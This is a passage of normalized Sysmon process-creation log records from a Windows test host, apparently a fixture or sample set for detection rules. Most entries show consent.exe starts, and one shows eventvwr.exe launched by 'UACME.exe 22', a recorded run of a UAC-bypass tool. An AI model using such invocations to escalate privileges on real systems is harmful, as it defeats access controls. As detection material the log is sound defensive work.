"subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.578Z", "type": "raw", "uuid": "5c42d076-4c0d-491a-9196-39f2693106e3"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7537753Z\"},\"EventRecordID\":\"5444\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 318 0000028064471300", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "4740", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.399Z", "type": "raw", "uuid": "2a8d15ba-ff8a-4709-b122-f4121ea80dd1"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7215806Z\"},\"EventRecordID\":\"5443\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.350\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001027dc0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4604\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", 
"object.process.guid": "747f3d96-7930-5d45-0000-001027dc0601", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4604", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.350Z", "type": "raw", "uuid": "46a33b2f-ec5a-47cd-b6c0-98543e66a016"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:15.6646074Z\"},\"EventRecordID\":\"5442\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:15.660\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792f-5d45-0000-00103da80601}\"},{\"Name\":\"ProcessId\",\"text\":\"2388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC170\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC170", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792f-5d45-0000-00103da80601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "2388", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:15.660Z", "type": "raw", "uuid": "4e1d5f0f-b3c3-429c-9ef4-1346dd1497c0"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.9773218Z\"},\"EventRecordID\":\"5441\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.972\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-00104a760601}\"},{\"Name\":\"ProcessId\",\"text\":\"8072\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC890\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC890", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-00104a760601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "8072", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.972Z", "type": "raw", "uuid": "e547ebd6-7c5c-43f5-976a-3338e6f9d1e8"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.3727351Z\"},\"EventRecordID\":\"5440\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.368\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-001001560601}\"},{\"Name\":\"ProcessId\",\"text\":\"6716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC9C0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC9C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-001001560601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "6716", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.368Z", "type": "raw", "uuid": "15801084-49e4-410f-8731-2d4fc0090ea9"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8748883Z\"},\"EventRecordID\":\"5439\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.760\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00107a250601}\"},{\"Name\":\"ProcessId\",\"text\":\"7472\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC3D0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": 